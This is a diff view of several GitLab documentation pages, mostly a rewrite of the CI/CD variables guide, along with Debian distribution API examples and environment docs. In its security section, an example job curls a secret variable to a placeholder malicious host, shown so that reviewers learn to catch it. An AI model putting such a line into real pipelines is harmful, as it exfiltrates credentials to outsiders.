- [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919).
- [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
## Recommended cloud providers and services
NOTE:

View File

@ -21232,6 +21232,7 @@ Represents vulnerability letter grades with associated projects.
| Name | Type | Description |
| ---- | ---- | ----------- |
| <a id="workitemauthor"></a>`author` **{warning-solid}** | [`UserCore`](#usercore) | **Introduced** in 15.9. This feature is in Alpha. It can be changed or removed at any time. User that created the work item. |
| <a id="workitemclosedat"></a>`closedAt` | [`Time`](#time) | Timestamp of when the work item was closed. |
| <a id="workitemconfidential"></a>`confidential` | [`Boolean!`](#boolean) | Indicates the work item is confidential. |
| <a id="workitemcreatedat"></a>`createdAt` | [`Time!`](#time) | Timestamp of when the work item was created. |

View File

@ -50,7 +50,7 @@ Example response:
[
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -90,7 +90,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -166,7 +166,7 @@ POST /groups/:id/debian_distributions
| `architectures` | architectures | no | The new Debian distribution's list of architectures. |
```shell
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/debian_distributions?codename=unstable"
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/debian_distributions?codename=sid"
```
Example response:
@ -174,7 +174,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -221,7 +221,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": "new-suite",
"origin": null,
"label": null,

View File

@ -49,7 +49,7 @@ Example response:
[
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -89,7 +89,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -165,7 +165,7 @@ POST /projects/:id/debian_distributions
| `architectures` | architectures | no | The new Debian distribution's list of architectures. |
```shell
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/debian_distributions?codename=unstable"
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/debian_distributions?codename=sid"
```
Example response:
@ -173,7 +173,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -220,7 +220,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": "new-suite",
"origin": null,
"label": null,

View File

@ -1,5 +1,5 @@
---
status: proposed
status: ongoing
creation-date: "2021-02-07"
authors: [ "@alexpooley", "@ifarkas" ]
coach: "@grzesiek"

View File

@ -62,11 +62,17 @@ To search environments by name:
## Types of environments
There are two types of environments:
An environment is either static or dynamic:
- Static environments have static names, like `staging` or `production`.
- Dynamic environments have dynamic names. Dynamic environments
are a fundamental part of [Review apps](../review_apps/index.md).
- Static environment
- Usually reused by successive deployments.
- Has a static name - for example, `staging` or `production`.
- Created manually or as part of a CI/CD pipeline.
- Dynamic environment
- Usually created in a CI/CD pipeline and used by only a single deployment, then either stopped or
deleted.
- Has a dynamic name, usually based on the value of a CI/CD variable.
- A feature of [review apps](../review_apps/index.md).
### Create a static environment

View File

@ -145,7 +145,7 @@ To execute a pipeline manually:
1. On the left sidebar, select **CI/CD > Pipelines**.
1. Select **Run pipeline**.
1. In the **Run for branch name or tag** field, select the branch or tag to run the pipeline for.
1. Enter any [environment variables](../variables/index.md) required for the pipeline to run.
1. Enter any [CI/CD variables](../variables/index.md) required for the pipeline to run.
You can set specific variables to have their [values prefilled in the form](#prefill-variables-in-manual-pipelines).
1. Select **Run pipeline**.

View File

@ -84,3 +84,4 @@ In SaaS runners on macOS, the objective is to make 90% of CI jobs start executin
- If the VM image does not include the specific software version you need for your job, then the job execution time will increase as the required software needs to be fetched and installed.
- At this time, it is not possible to bring your own OS image.
- The keychain for user `gitlab` is not publicly available. You must create a keychain instead.

View File

@ -197,7 +197,7 @@ to learn more about how to define one.
To disable Code Quality, create a custom CI/CD variable named `CODE_QUALITY_DISABLED`, for either:
- [The whole project](../variables/index.md#for-a-project).
- [A single pipeline](../variables/index.md#override-a-variable-when-running-a-pipeline-manually).
- [A single pipeline](../pipelines/index.md#run-a-pipeline-manually).
## Customizing scan settings

View File

@ -13,20 +13,12 @@ CI/CD variables are a type of environment variable. You can use them to:
- Store values you want to re-use.
- Avoid hard-coding values in your `.gitlab-ci.yml` file.
You can use:
- [Predefined CI/CD variables](#predefined-cicd-variables).
- [Variables defined in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file).
- [Variables defined in project, group, or instance settings](#define-a-cicd-variable-in-the-ui).
You can [override variable values manually for a specific pipeline](../jobs/index.md#specifying-variables-when-running-manual-jobs),
or have them [prefilled in manual pipelines](../pipelines/index.md#prefill-variables-in-manual-pipelines).
Variable names are limited by the [shell the runner uses](https://docs.gitlab.com/runner/shells/index.html)
to execute scripts. Each shell has its own set of reserved variable names.
Make sure each variable is defined for the [scope you want to use it in](where_variables_can_be_used.md).
> For more information about advanced use of GitLab CI/CD:
>
> - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i>&nbsp;Get to productivity faster with these [7 advanced GitLab CI workflow hacks](https://about.gitlab.com/webcast/7cicd-hacks/)
@ -37,97 +29,113 @@ Make sure each variable is defined for the [scope you want to use it in](where_v
## Predefined CI/CD variables
GitLab CI/CD makes a set of [predefined CI/CD variables](predefined_variables.md)
available for use in pipeline configuration and job scripts. You can use predefined CI/CD variables
in your `.gitlab-ci.yml` without declaring them first.
available for use in pipeline configuration and job scripts. These variables contain
information about the job, pipeline, and other values you might need when the pipeline
is triggered or running.
You can use predefined CI/CD variables in your `.gitlab-ci.yml` without declaring them first.
For example:
```yaml
job1:
stage: test
script:
- echo "$CI_JOB_STAGE"
- echo "The job's stage is '$CI_JOB_STAGE'"
```
The script in this example outputs the stage for the `job1` job, which is `test`.
The script in this example outputs `The job's stage is 'test'`.
## Define a CI/CD variable in the `.gitlab-ci.yml` file
To create a custom variable in the [`.gitlab-ci.yml`](../yaml/index.md#variables) file,
define the variable and value with `variables` keyword.
To create a CI/CD variable in the `.gitlab-ci.yml` file, define the variable and
value with the [`variables`](../yaml/index.md#variables) keyword.
You can use the `variables` keyword in a job or at the top level of the `.gitlab-ci.yml` file.
If the variable is at the top level, it's globally available and all jobs can use it.
If it's defined in a job, only that job can use it.
Variables saved in the `.gitlab-ci.yml` file are visible to all users with access to
the repository, and should store only non-sensitive project configuration. For example,
the URL of a database saved in a `DATABASE_URL` variable. Sensitive variables containing values
like secrets or keys should be [stored in project settings](#define-a-cicd-variable-in-the-ui).
You can use `variables` in a job or at the top level of the `.gitlab-ci.yml` file.
If the variable is defined:
- At the top level, it's globally available and all jobs can use it.
- In a job, only that job can use it.
For example:
```yaml
variables:
TEST_VAR: "All jobs can use this variable's value"
GLOBAL_VAR: "A global variable"
job1:
variables:
TEST_VAR_JOB: "Only job1 can use this variable's value"
JOB_VAR: "A job variable"
script:
- echo "$TEST_VAR" and "$TEST_VAR_JOB"
- echo "Variables are '$GLOBAL_VAR' and '$JOB_VAR'"
job2:
script:
- echo "Variables are '$GLOBAL_VAR' and '$JOB_VAR'"
```
Variables saved in the `.gitlab-ci.yml` file should store only non-sensitive project
configuration, like a `RAILS_ENV` or `DATABASE_URL` variable. These variables are
visible in the repository. Store sensitive variables containing values like secrets or keys
in project settings.
In this example:
Variables saved in the `.gitlab-ci.yml` file are also available in [service containers](../docker/using_docker_images.md).
- `job1` outputs `Variables are 'A global variable' and 'A job variable'`
- `job2` outputs `Variables are 'A global variable' and ''`
Use the [`value` and `description`](../yaml/index.md#variablesdescription) keywords
to define [variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines)
for [manually-triggered pipelines](../pipelines/index.md#run-a-pipeline-manually).
### Skip global variables in a single job
If you don't want globally defined variables to be available in a job, set `variables`
to `{}`:
```yaml
variables:
GLOBAL_VAR: "A global variable"
job1:
variables: {}
script:
- echo This job does not need any variables
```
Use the [`value` and `description`](../yaml/index.md#variablesdescription)
keywords to define [variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines)
for [manually-triggered pipelines](../pipelines/index.md#run-a-pipeline-manually).
## Define a CI/CD variable in the UI
You can define CI/CD variables in the UI:
Sensitive variables like tokens or passwords should be stored in the settings in the UI,
not [in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file).
Define CI/CD variables in the UI:
- For a project:
- [In the project's settings](#for-a-project).
- [With the API](../../api/project_level_variables.md).
- For a project [in the project's settings](#for-a-project).
- For all projects in a group [in the group's setting](#for-a-group).
- For all projects in a GitLab instance [in the instance's settings](#for-an-instance).
By default, pipelines from forked projects can't access CI/CD variables in the parent project.
Alternatively, these variables can be added by using the API:
- [With the project-level variables API endpoint](../../api/project_level_variables.md).
- [With the group-level variables API endpoint](../../api/group_level_variables.md).
- [With the instance-level variables API endpoint](../../api/instance_level_ci_variables.md).
By default, pipelines from forked projects can't access the CI/CD variables available to the parent project.
If you [run a merge request pipeline in the parent project for a merge request from a fork](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project),
all variables become available to the pipeline.
Variables set in the GitLab UI are **not** passed down to [service containers](../docker/using_docker_images.md).
To set them, assign them to variables in the UI, then re-assign them in your `.gitlab-ci.yml`:
```yaml
variables:
SA_PASSWORD: $SA_PASSWORD
```
### For a project
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/362227) in GitLab 15.7, projects can define a maximum of 200 CI/CD variables.
You can add CI/CD variables to a project's settings. Only project members with the
Maintainer role
can add or update project CI/CD variables. To keep a CI/CD variable secret, put it
in the project settings, not in the `.gitlab-ci.yml` file.
You can add CI/CD variables to a project's settings.
Prerequisite:
- You must be a project member with the Maintainer role.
To add or update variables in the project settings:
1. Go to your project's **Settings > CI/CD** and expand the **Variables** section.
1. Select **Add variable** and fill in the details:
- **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
- **Value**: No limitations.
- **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables).
@ -146,19 +154,16 @@ or in [job scripts](#use-cicd-variables-in-job-scripts).
> - Support for environment scopes [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/2874) in GitLab Premium 13.11
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/362227) in GitLab 15.7, groups can define a maximum of 200 CI/CD variables.
To make a CI/CD variable available to all projects in a group, define a group CI/CD variable.
You must be a group owner.
You can make a CI/CD variable available to all projects in a group.
Use group variables to store secrets like passwords, SSH keys, and credentials, if you:
Prerequisite:
- Do not use an external key store.
- Use the GitLab [integration with HashiCorp Vault](../secrets/index.md).
- You must be a group member with the Owner role.
To add a group variable:
1. In the group, go to **Settings > CI/CD**.
1. Select **Add variable** and fill in the details:
- **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
- **Value**: No limitations.
- **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables).
@ -178,17 +183,17 @@ are recursively inherited.
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14108) in GitLab 13.0.
> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/299879) in GitLab 13.11.
To make a CI/CD variable available to all projects and groups in a GitLab instance,
add an instance CI/CD variable. You must have administrator access.
You can make a CI/CD variable available to all projects and groups in a GitLab instance.
You can define instance variables via the UI or [API](../../api/instance_level_ci_variables.md).
Prerequisite:
- You must have administrator access.
To add an instance variable:
1. On the top bar, select **Main menu > Admin**.
1. On the left sidebar, select **Settings > CI/CD** and expand the **Variables** section.
1. Select **Add variable** and fill in the details:
- **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
- **Value**: In [GitLab 13.3 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/220028),
the value is limited to 10,000 characters, but also bounded by any limits in the
@ -204,10 +209,8 @@ The instance variables that are available in a project are listed in the project
## CI/CD variable security
Malicious code pushed to your `.gitlab-ci.yml` file could compromise your variables
and send them to a third party server regardless of the masked setting. If the pipeline
runs on a [protected branch](../../user/project/protected_branches.md) or
[protected tag](../../user/project/protected_tags.md), malicious code can compromise protected variables.
Code pushed to the `.gitlab-ci.yml` file could compromise your variables. Variables could
be accidentally exposed in a job log, or maliciously sent to a third party server.
Review all merge requests that introduce changes to the `.gitlab-ci.yml` file before you:
@ -219,11 +222,27 @@ Review the `.gitlab-ci.yml` file of imported projects before you add files or ru
The following example shows malicious code in a `.gitlab-ci.yml` file:
```yaml
build:
script:
accidental-leak-job:
script: # Password exposed accidentally
- echo "This script logs into the DB with $USER $PASSWORD"
- db-login $USER $PASSWORD
malicious-job:
script: # Secret exposed maliciously
- curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/"
```
To help reduce the risk of accidentally leaking secrets through scripts like in `accidental-leak-job`,
all variables containing sensitive information should be [masked in job logs](#mask-a-cicd-variable).
You can also [limit a variable to protected branches and tags only](#protect-a-cicd-variable).
Alternatively, use the GitLab [integration with HashiCorp Vault](../secrets/index.md)
to store and retrieve secrets.
Malicious scripts like in `malicious-job` must be caught during the review process.
Reviewers should never trigger a pipeline when they find code like this, because
malicious code can compromise both masked and protected variables.
Variable values are encrypted using [`aes-256-cbc`](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard)
and stored in the database. This data can only be read and decrypted with a
valid [secrets file](../../raketasks/backup_restore.md#when-the-secrets-file-is-lost).
@ -232,9 +251,20 @@ valid [secrets file](../../raketasks/backup_restore.md#when-the-secrets-file-is-
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/330650) in GitLab 13.12, the `~` character can be used in masked variables.
WARNING:
Masking a CI/CD variable is not a guaranteed way to prevent malicious users from
accessing variable values. The masking feature is "best-effort" and there to
help when a variable is accidentally revealed. To make variables more secure,
consider using [external secrets](../secrets/index.md) and [file type variables](#use-file-type-cicd-variables)
to prevent commands such as `env`/`printenv` from printing secret variables.
You can mask a project, group, or instance CI/CD variable so the value of the variable
does not display in job logs.
Prerequisite:
- You must have the same role or access level as required to [define a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui).
To mask a variable:
1. In the project, group, or Admin Area, go to **Settings > CI/CD**.
@ -252,21 +282,13 @@ The value of the variable must:
- The `@`, `:`, `.`, or `~` characters.
- Not match the name of an existing predefined or custom CI/CD variable.
WARNING:
Masking a CI/CD variable is not a guaranteed way to prevent malicious users from
accessing variable values. The masking feature is "best-effort" and there to
help when a variable is accidentally revealed. To make variables more secure,
consider using [external secrets](../secrets/index.md) and [file type variables](#use-file-type-cicd-variables)
to prevent commands such as `env`/`printenv` from printing secret variables.
Different versions of [GitLab Runner](../runners/index.md) have different masking limitations:
Runner versions implement masking in different ways, some with technical
limitations. Below is a table of such limitations.
| Version from | Version to | Limitations |
| ------------ | ---------- | ------ |
| v11.9.0 | v14.1.0 | Masking of large secrets (greater than 4 KiB) could potentially be [revealed](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28128). No sensitive URL parameter masking. |
| v14.2.0 | v15.3.0 | The tail of a large secret (greater than 4 KiB) could potentially be [revealed](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28128). No sensitive URL parameter masking. |
| v15.7.0 | | Potential for secrets to be revealed when `CI_DEBUG_SERVICES` is enabled. For details, read about [service container logging](../services/index.md#capturing-service-container-logs). |
| Version | Limitations |
| ------------------- | ----------- |
| v14.1.0 and earlier | Masking of large secrets (greater than 4 KiB) could potentially be [revealed](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28128). No sensitive URL parameter masking. |
| v14.2.0 to v15.3.0 | The tail of a large secret (greater than 4 KiB) could potentially be [revealed](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28128). No sensitive URL parameter masking. |
| v15.7.0 and later | Secrets could be revealed when `CI_DEBUG_SERVICES` is enabled. For details, read about [service container logging](../services/index.md#capturing-service-container-logs). |
### Protect a CI/CD variable
@ -276,11 +298,14 @@ or [protected tags](../../user/project/protected_tags.md).
[Merged results pipelines](../pipelines/merged_results_pipelines.md), which run on a
temporary merge commit, not a branch or tag, do not have access to these variables.
[Merge request pipelines](../pipelines/merge_request_pipelines.md), which do not use
a temporary merge commit, can access these variables if the branch is a protected branch.
Pipelines that run directly on the merge request's source branch, with no added merge commit, can access
these variables if the source branch is a protected branch.
Prerequisite:
To mark a variable as protected:
- You must have the same role or access level as required to [define a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui).
To set a variable as protected:
1. Go to **Settings > CI/CD** in the project, group or instance Admin Area.
1. Expand the **Variables** section.
@ -293,36 +318,35 @@ The variable is available for all subsequent pipelines.
### Use file type CI/CD variables
All predefined CI/CD variables and variables defined in the `.gitlab-ci.yml` file
are `Variable` type. Project, group and instance CI/CD variables can be `Variable`
or `File` type.
`Variable` type variables:
are "variable" type ([`variable_type` of `env_var` in the API](#define-a-cicd-variable-in-the-ui)).
Variable type variables:
- Consist of a key and value pair.
- Are made available in jobs as environment variables, with:
- The CI/CD variable key as the environment variable name.
- The CI/CD variable value as the environment variable value.
Use `File` type CI/CD variables for tools that need a file as input.
Project, group, and instance CI/CD variables are "variable" type by default, but can
optionally be set as a "file" type ([`variable_type` of `file` in the API](#define-a-cicd-variable-in-the-ui)).
File type variables:
`File` type variables:
- Consist of a key, value and file.
- Are made available in jobs as environment variables, with
- Consist of a key, value, and file.
- Are made available in jobs as environment variables, with:
- The CI/CD variable key as the environment variable name.
- The CI/CD variable value saved to a temporary file.
- The path to the temporary file as the environment variable value.
Some tools like [the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html)
Use file type CI/CD variables for tools that need a file as input. [The AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html)
and [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable)
use `File` type variables for configuration.
are both tools that use `File` type variables for configuration.
For example, if you have the following variables:
For example, if you are using `kubectl` with:
- A variable of type `Variable`: `KUBE_URL` with the value `https://example.com`.
- A variable of type `File`: `KUBE_CA_PEM` with a certificate as the value.
- A variable with a key of `KUBE_URL` and `https://example.com` as the value.
- A file type variable with a key of `KUBE_CA_PEM` and a certificate as the value.
Use the variables in a job script like this:
Pass `KUBE_URL` as a `--server` option, which accepts a variable, and pass `$KUBE_CA_PEM`
as a `--certificate-authority` option, which accepts a path to a file:
```shell
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM"
@ -331,19 +355,27 @@ kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KU
WARNING:
Be careful when assigning the value of a file variable to another variable. The other
variable takes the content of the file as its value, **not** the path to the file.
See [issue 29407](https://gitlab.com/gitlab-org/gitlab/-/issues/29407) for more details.
[Issue 29407](https://gitlab.com/gitlab-org/gitlab/-/issues/29407) proposes to change this behavior.
An alternative to `File` type variables is to:
#### Use a `.gitlab-ci.yml` variable as a file type variable
- Read the value of a CI/CD variable (`variable` type).
- Save the value in a file.
- Use that file in your script.
You cannot set a CI/CD variable [defined in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file)
as a file type variable. If you have a tool that requires a file path as an input,
but you want to use a variable defined in the `.gitlab-ci.yml`:
```shell
# Read certificate stored in $KUBE_CA_PEM variable and save it in a new file
echo "$KUBE_CA_PEM" > "$(pwd)/kube.ca.pem"
# Pass the newly created file to kubectl
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$(pwd)/kube.ca.pem"
- Run a command that saves the value of the variable in a file.
- Use that file with your tool.
For example:
```yaml
variables:
SITE_URL: "https://example.gitlab.com"
job:
script:
- echo "$SITE_URL" > "site-url.txt"
- mytool --url-file="site-url.txt"
```
## Use CI/CD variables in job scripts
@ -368,7 +400,7 @@ job_name:
### With PowerShell
To access variables in a Windows PowerShell environment, including environment
variables set by the system, prefix the variable name with (`$env:`) or (`$`):
variables set by the system, prefix the variable name with `$env:` or `$`:
```yaml
job_name:
@ -389,8 +421,7 @@ job_name:
### With Windows Batch
To access CI/CD variables in Windows Batch, surround the variable
with `%`:
To access CI/CD variables in Windows Batch, surround the variable with `%`:
```yaml
job_name:
@ -399,7 +430,7 @@ job_name:
```
You can also surround the variable with `!` for [delayed expansion](https://ss64.com/nt/delayedexpansion.html).
Delayed expansion might be needed for variables that contain white spaces or newlines.
Delayed expansion might be needed for variables that contain white spaces or newlines:
```yaml
job_name:
@ -407,29 +438,43 @@ job_name:
- echo !ERROR_MESSAGE!
```
### In service containers
[Service containers](../docker/using_docker_images.md) can use CI/CD variables, but
by default can only access [variables saved in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file).
Variables [set in the GitLab UI](#define-a-cicd-variable-in-the-ui) by default are not available to
service containers. To make a UI-defined variable available in a service container,
re-assign it in your `.gitlab-ci.yml`:
```yaml
variables:
SA_PASSWORD_YAML_FILE: $SA_PASSWORD_UI
```
### Pass an environment variable to another job
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22638) in GitLab 13.0.
> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/217834) in GitLab 13.1.
You can pass environment variables from one job to another job in a later stage
through variable inheritance.
These variables cannot be used as CI/CD variables to configure a pipeline, but
they can be used in job scripts.
You can create a new environment variables in a job, and pass it to another job
in a later stage. These variables cannot be used as CI/CD variables to configure a pipeline,
but they can be used in job scripts.
To pass a job-created environment variable to other jobs:
1. In the job script, save the variable as a `.env` file.
- The format of the file must be one variable definition per line.
- Each defined line must be of the form `VARIABLE_NAME=ANY VALUE HERE`.
- Each line must be formatted as: `VARIABLE_NAME=ANY VALUE HERE`.
- Values can be wrapped in quotes, but cannot contain newline characters.
1. Save the `.env` file as an [`artifacts:reports:dotenv`](../yaml/artifacts_reports.md#artifactsreportsdotenv)
artifact.
1. Jobs in later stages can then [use the variable in scripts](#use-cicd-variables-in-job-scripts).
Inherited variables [take precedence](#cicd-variable-precedence) over
certain types of new variable definitions such as job defined variables.
For example:
```yaml
build:
build-job:
stage: build
script:
- echo "BUILD_VARIABLE=value_from_build_job" >> build.env
@ -437,92 +482,95 @@ build:
reports:
dotenv: build.env
deploy:
stage: deploy
variables:
BUILD_VARIABLE: value_from_deploy_job
test-job:
stage: test
script:
- echo "$BUILD_VARIABLE" # Output is: 'value_from_build_job' due to precedence
environment: production
- echo "$BUILD_VARIABLE" # Output is: 'value_from_build_job'
```
The [`dependencies`](../yaml/index.md#dependencies) or
[`needs`](../yaml/index.md#needs) keywords can be used to control
which jobs receive inherited values.
Variables from `dotenv` reports [take precedence](#cicd-variable-precedence) over
certain types of new variable definitions such as job defined variables.
To have no inherited dotenv environment variables, pass an empty `dependencies` or
`needs` list, or pass [`needs:artifacts`](../yaml/index.md#needsartifacts) as `false`
You can also [pass `dotenv` variables to downstream pipelines](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job)
#### Control which jobs receive `dotenv` variables
You can use the [`dependencies`](../yaml/index.md#dependencies) or [`needs`](../yaml/index.md#needs)
keywords to control which jobs receive the `dotenv` artifacts.
To have no environment variables from a `dotenv` artifact:
- Pass an empty `dependencies` or `needs` array.
- Pass [`needs:artifacts`](../yaml/index.md#needsartifacts) as `false`.
- Set `needs` to only list jobs that do not have a `dotenv` artifact.
For example:
```yaml
build:
build-job1:
stage: build
script:
- echo "BUILD_VERSION=hello" >> build.env
- echo "BUILD_VERSION=v1.0.0" >> build.env
artifacts:
reports:
dotenv: build.env
deploy_one:
stage: deploy
build-job2:
stage: build
needs: []
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
- echo "This job has no dotenv artifacts"
test-job1:
stage: test
script:
- echo "$BUILD_VERSION" # Output is: 'v1.0.0'
dependencies:
- build
environment:
name: customer1
deployment_tier: production
deploy_two:
stage: deploy
test-job2:
stage: test
script:
- echo "$BUILD_VERSION" # Output is empty
- echo "$BUILD_VERSION" # Output is ''
dependencies: []
environment:
name: customer2
deployment_tier: production
deploy_three:
stage: deploy
test-job3:
stage: test
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
- echo "$BUILD_VERSION" # Output is: 'v1.0.0'
needs:
- build
environment:
name: customer3
deployment_tier: production
- build-job1
deploy_four:
stage: deploy
test-job4:
stage: test
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
- echo "$BUILD_VERSION" # Output is: 'v1.0.0'
needs:
job: build
job: build-job1
artifacts: true
environment:
name: customer4
deployment_tier: production
deploy_five:
test-job5:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is empty
- echo "$BUILD_VERSION" # Output is ''
needs:
job: build
job: build-job1
artifacts: false
environment:
name: customer5
deployment_tier: production
```
[Multi-project pipelines](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job)
can also inherit variables from their upstream pipelines.
test-job6:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is ''
needs:
- build-job2
```
### Store multiple values in one variable
You cannot create a CI/CD variable that is an array of values, but you
can use shell scripting techniques for similar behavior.
For example, you can store multiple variables separated by a space in a variable,
For example, you can store multiple values separated by a space in a variable,
then loop through the values with a script:
```yaml
@ -552,7 +600,8 @@ job:
### Use the `$` character in CI/CD variables
If you do not want the `$` character interpreted as the start of a variable, use `$$` instead:
If you do not want the `$` character interpreted as the start of another variable,
use `$$` instead:
```yaml
job:
@ -568,9 +617,14 @@ job:
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217309) in GitLab 15.7.
Expanded variables treat values with the `$` character as a reference to another variable.
CI/CD variables are expanded by default.
CI/CD variables are expanded by default. To treat variables with a `$` character as raw strings,
disable variable expansion for the variable
To treat variables with a `$` character as raw strings, disable variable expansion for the variable:
Prerequisite:
- You must have the same role or access level as required to [define a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui).
To disable variable expansion for the variable:
1. In the project or group, go to **Settings > CI/CD**.
1. Expand the **Variables** section.
@ -586,10 +640,10 @@ which variables take precedence.
The order of precedence for variables is (from highest to lowest):
1. These all have the same (highest) precedence:
1. These variables all have the same (highest) precedence:
- [Trigger variables](../triggers/index.md#pass-cicd-variables-in-the-api-call).
- [Scheduled pipeline variables](../pipelines/schedules.md#add-a-pipeline-schedule).
- [Manual pipeline run variables](#override-a-variable-when-running-a-pipeline-manually).
- [Manual pipeline run variables](../pipelines/index.md#run-a-pipeline-manually).
- Variables added when [creating a pipeline with the API](../../api/pipelines.md#create-a-new-pipeline).
1. Project [variables](#for-a-project).
1. Group [variables](#for-a-group). If the same variable name exists in a
@ -597,14 +651,13 @@ The order of precedence for variables is (from highest to lowest):
you have `Group > Subgroup 1 > Subgroup 2 > Project`, the variable defined in
`Subgroup 2` takes precedence.
1. Instance [variables](#for-an-instance).
1. [Inherited variables](#pass-an-environment-variable-to-another-job).
1. [Variables from `dotenv` reports](#pass-an-environment-variable-to-another-job).
1. Variables defined in jobs in the `.gitlab-ci.yml` file.
1. Variables defined outside of jobs (globally) in the `.gitlab-ci.yml` file.
1. [Deployment variables](predefined_variables.md#deployment-variables).
1. [Predefined variables](predefined_variables.md).
In the following example, when the script in `job1` executes, the value of `API_TOKEN` is `secure`.
Variables defined in jobs have a higher precedence than variables defined globally.
For example:
```yaml
variables:
@ -614,50 +667,40 @@ job1:
variables:
API_TOKEN: "secure"
script:
- echo "The variable value is $API_TOKEN"
- echo "The variable is '$API_TOKEN'"
```
In this example, `job1` outputs `The variable is 'secure'` because variables defined in jobs
have higher precedence than variables defined globally.
### Override a defined CI/CD variable
You can override the value of a variable when you:
1. [Run a pipeline manually](#override-a-variable-when-running-a-pipeline-manually) in the UI.
1. Create a pipeline by using [the API](../../api/pipelines.md#create-a-new-pipeline).
1. Run a job manually in the UI.
1. Use [push options](../../user/project/push_options.md#push-options-for-gitlab-cicd).
1. Trigger a pipeline by using [the API](../triggers/index.md#pass-cicd-variables-in-the-api-call).
1. Pass variables to a downstream pipeline [by using the `variable` keyword](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline)
or [by using variable inheritance](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job).
- [Run a pipeline manually](../pipelines/index.md#run-a-pipeline-manually) in the UI.
- Create a pipeline by using [the `pipelines` API endpoint](../../api/pipelines.md#create-a-new-pipeline).
- Use [push options](../../user/project/push_options.md#push-options-for-gitlab-cicd).
- Trigger a pipeline by using [the `triggers` API endpoint](../triggers/index.md#pass-cicd-variables-in-the-api-call).
- Pass variables to a downstream pipeline [by using the `variable` keyword](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline)
or [by using `dotenv` variables](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job).
The pipeline variables declared in these events take [priority over other variables](#cicd-variable-precedence).
NOTE:
You should avoid overriding [predefined variables](predefined_variables.md),
as it can cause the pipeline to behave unexpectedly.
### Override a variable when running a pipeline manually
You can override the value of a CI/CD variable when you
[run a pipeline manually](../pipelines/index.md#run-a-pipeline-manually).
1. Go to your project's **CI/CD > Pipelines** and select **Run pipeline**.
1. Choose the branch you want to run the pipeline for.
1. Input the variable and its value in the UI.
You should avoid overriding [predefined variables](predefined_variables.md), as it
can cause the pipeline to behave unexpectedly.
### Restrict who can override variables
